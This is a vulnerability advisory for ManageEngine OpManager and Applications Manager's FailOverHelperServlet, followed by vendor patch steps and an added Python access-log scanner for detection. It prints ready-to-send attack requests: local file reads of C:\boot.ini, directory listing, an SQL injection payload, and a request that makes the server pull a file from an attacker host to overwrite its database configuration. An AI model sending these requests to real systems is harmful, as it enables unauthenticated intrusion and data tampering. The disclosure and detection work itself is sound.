Vulnerabilities in FailOverHelperServlet
>> Technical details:
The affected servlet is the "FailOverHelperServlet" or, if you prefer,
FailServlet.
It is possible to hijack the failover operation completely.
#1
Vulnerability: Local file include
Constraints: unauthenticated in all products
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX
POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=C:\\boot.ini
#2
Vulnerability: Information disclosure - list all files in a directory
and its children
Constraints: unauthenticated in all products
Affected versions: ManageEngine Applications Manager v? to v11.Y
bXXXX; ManageEngine OpManager v8 - v11.Y bXXXXX
POST /servlet/FailOverHelperServlet?operation=listdirectory&rootDirectory=C:\\
#3
Vulnerability: Blind SQL injection
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Constraints: unauthenticated in OpManager and Applications Manager;
authenticated in IT360
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=[SQLi_1]&serverRole=[SQLi_2]
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a')%3b+create+table+bacas+(bodas+text)%3b--+&serverRole=a
#4
Vulnerability: Database configuration file overwrite
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Constraints: unauthenticated in OpManager and Applications Manager;
authenticated in IT360
This will cause the server to make a request to
http://192.168.56.101/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServletcopy?operation=copyfile&fileName=bla
in exactly the same way as vulnerability #1. The file will then overwrite
./conf/database_params.conf
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=requestToConfBackup&serverhost=192.168.56.101&serverport=80&webprotocol=http&fileName=bla
#5
Vulnerability: License configuration file overwrite
Affected versions: ManageEngine OpManager v8 - v11.Y bXXXXX
Note that you can only overwrite the license file with another valid
license and do not control the path. So it's a very very low risk
vulnerability (if it can be called that).
POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=licensefile
We have a patch for these vulnerabilities for build 11400.
Steps to apply the patch:
1. Stop the OpManager service.
2. Take a backup of the <OpManager home>\WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
3. Extract the attached zip under <OpManager home>.
It will extract the patch under the WEB-INF\classes\com\adventnet\me\opmanager\servlet folder.
4. Stop and start OpManager.
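
To check whether the servlet has been reached on an existing installation, the web access log can be searched for the five operations listed in the advisory above. The following is an added example, not part of the original advisory or of ManageEngine's code: it parses access-log lines and tags each FailOverHelperServlet request with the advisory item whose operation it carries. The Common Log Format layout, the failover_peers allow-list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Operation names from the advisory, keyed to its item numbers.
OPERATIONS = {
    "copyfile": "#1 local file include",
    "listdirectory": "#2 directory listing",
    "standbyupdateincentral": "#3 blind SQL injection",
    "requesttoconfbackup": "#4 database configuration file overwrite",
    "licensefile": "#5 license configuration file overwrite",
}

# Assumption: the access log uses Common Log Format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def scan(lines, failover_peers=()):
    """Return one finding per logged request that reaches FailOverHelperServlet."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if "failoverhelperservlet" not in url.path.lower():
            continue
        query = parse_qs(url.query, keep_blank_values=True)
        # Parameters sent in a POST body are not logged; the operation is then
        # empty and the request is still reported because of the path.
        op = next((v[0] for k, v in query.items() if k.lower() == "operation"), "")
        findings.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "operation": op,
            "advisory_item": OPERATIONS.get(op.lower(), "unlisted or not logged"),
            "from_failover_peer": m["ip"] in failover_peers,
        })
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2015:10:00:00 +0000] "POST /servlet/FailOverHelperServlet?operation=copyfile&fileName=bla HTTP/1.1" 200 18',
    '203.0.113.7 - - [01/Jan/2015:10:00:05 +0000] "POST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=standbyUpdateInCentral&customerName=a&serverRole=a HTTP/1.1" 200 0',
    '198.51.100.20 - - [01/Jan/2015:10:01:00 +0000] "GET /index.html HTTP/1.1" 200 4096',
    '192.0.2.10 - - [01/Jan/2015:10:02:00 +0000] "POST /servlet/FailOverHelperServlet HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for f in scan(SAMPLE, failover_peers={"192.0.2.10"}):
        print(f)
```

Any finding with from_failover_peer set to False deserves review, since the advisory states these operations are reachable without authentication in OpManager and Applications Manager.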